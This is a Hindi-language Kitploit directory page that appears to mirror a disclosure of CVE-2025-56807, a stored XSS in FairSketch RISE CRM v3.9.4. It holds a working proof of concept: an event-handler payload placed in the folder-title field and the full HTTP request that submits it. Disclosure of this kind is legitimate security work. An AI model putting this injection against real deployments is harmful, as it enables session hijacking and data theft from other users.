Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/aqwainfosec/cve-2025-56807
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

FairSketch RISE अल्टीमेट प्रोजेक्ट मैनेजर और CRM v3.9.4 में संग्रहीत XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, फ़ोल्डर शीर्षक इंजेक्शन के माध्यम से मनमाना JavaScript निष्पादन का प्रदर्शन।

रिपॉजिटरी देखें
10 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-56807

विवरण

FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) में फ़ाइल प्रबंधक कार्यक्षमता में एक संग्रहित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई। यह भेद्यता title parameter में है जो नए फ़ोल्डर बनाते समय सबमिट किया जाता है। अपर्याप्त इनपुट सैनिटाइजेशन के कारण, हमलावर HTML/JavaScript payloads (जैसे, <details/open/ontoggle=prompt(origin)>) इंजेक्ट कर सकता है। पेलोड फ़ोल्डर के नाम में संग्रहित हो जाता है और फ़ाइल प्रबंधक में फ़ोल्डरों को सूचीबद्ध करते समय निष्पादित होता है, जिससे प्रभावित फ़ोल्डर को देखने वाले किसी भी उपयोगकर्ता के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादन संभव होता है। इसके परिणामस्वरूप सत्र अपहरण और डेटा बहिर्गमन हो सकता है।

[!NOTE]
यह भेद्यता केवल व्यवस्थापक खातों तक सीमित नहीं है। इसे किसी भी उपयोगकर्ता खाते का उपयोग करके शोषित किया जा सकता है जिसके पास फ़ाइल प्रबंधक में नए फ़ोल्डर बनाने की अनुमति है।

प्रकटीकरण समयरेखा

  • निर्दिष्ट CVE ID: CVE-2025-56807
  • खोज: जुलाई 2025 (Aqwa Hameed द्वारा)
  • विक्रेता को सूचित किया गया: Fairsketch समर्थन को ईमेल किया गया
  • प्रतिक्रिया: 22 जुलाई, 2025 को विक्रेता द्वारा स्वीकार किया गया

प्रूफ ऑफ कॉन्सेप्ट (PoC)

  1. वैध क्रेडेंशियल के साथ लॉगिन करें।

  2. Files पर जाएँ

    Dashboard

  3. New Folder पर क्लिक करें

    File Manager

  4. Title फ़ील्ड में नीचे दिया गया पेलोड दर्ज करें:

<details/open/ontoggle=prompt(origin)>

Folder Title

  1. पेलोड को ट्रिगर करने के लिए फ़ाइल प्रबंधक पृष्ठ को पुनः लोड करें

    Payload Execution

अनुरोध

POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
टूल डाउनलोड करें